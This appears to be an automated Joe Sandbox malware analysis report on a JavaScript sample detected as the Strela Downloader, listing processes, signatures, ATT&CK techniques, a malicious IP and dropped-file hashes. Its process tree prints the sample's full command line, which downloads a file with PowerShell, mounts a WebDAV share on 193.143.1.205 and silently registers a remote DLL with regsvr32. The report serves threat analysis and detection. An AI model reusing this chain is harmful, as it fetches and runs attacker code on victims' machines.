Windows
Analysis Report
238395810148579476.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 4616 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\23839 5810148579 476.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2992 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\172 7419210258 54.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4160 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7116 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1036 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 4600 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 12 --field -trial-han dle=1656,i ,458036182 8108545313 ,175293272 2350853037 7,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 5376 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
3% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587773 |
Start date and time: | 2025-01-10 17:51:30 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 8s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 238395810148579476.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 3.233.129.217, 52.6.155.20, 3.219.243.226, 52.22.41.97, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 199.232.210.172, 2.16.168.105, 2.16.168.107, 23.204.152.210, 23.204.152.213, 192.168.2.6, 13.107.246.45, 4.175.87.197, 104.78.188.188
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:52:32 | API Interceptor | |
11:52:35 | API Interceptor | |
11:52:36 | API Interceptor | |
11:52:43 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7262937329394263 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0M:9JZj5MiKNnNhoxux |
MD5: | 40CD3D6EDB7ACE09D8751F4FC901741D |
SHA1: | BED53D94E55F404B045CCA17D3B062693E1C73E7 |
SHA-256: | 7364006CCD2491E6050F35432B6D9E7867D0EEE5EB1AAF44EA25E6209CCD16E5 |
SHA-512: | 8844E479599B2CEA48B1629ACA8E9DCBDDF070BABE16473D5BB3A855C751DA618F5280A2C8792FC7ED91256A650BF5C07D7D6BA3ADCBAE08A5244D6ED0704A99 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555879531351217 |
Encrypted: | false |
SSDEEP: | 1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL |
MD5: | B2BC2F4D028B913AA6A1452B2A729D99 |
SHA1: | 2373C2A3C00F60DF0D9F79291E043174D63D14FE |
SHA-256: | 5ACFBFDF227F83495DA8B3AA044A29DBDF5616002C6F4139247DF1A8D4871F15 |
SHA-512: | 32AF6EDA03CB988EFD2C30600FE93E8F578CC7951B5FF063B3ED4FF67EAB2DD7C86589AD0A9A87DC0B225EE2172153E2A4EBE3948A3FA9F058BD791938FE10A8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07973513345857716 |
Encrypted: | false |
SSDEEP: | 3:6/WlyYe2TJ9efNaAPaU1lMStalluxmO+l/SNxOf:6/dzSnENDPaU0vgmOH |
MD5: | BA8CD09F271EA530C987E2E06A1BEF7B |
SHA1: | A73C5B3742706998A013D3B89915EA57A3FBEE65 |
SHA-256: | AE47F253B0880E045F72B6D4652E4F50076F555A3DBD3801ABC5BE7864073EC9 |
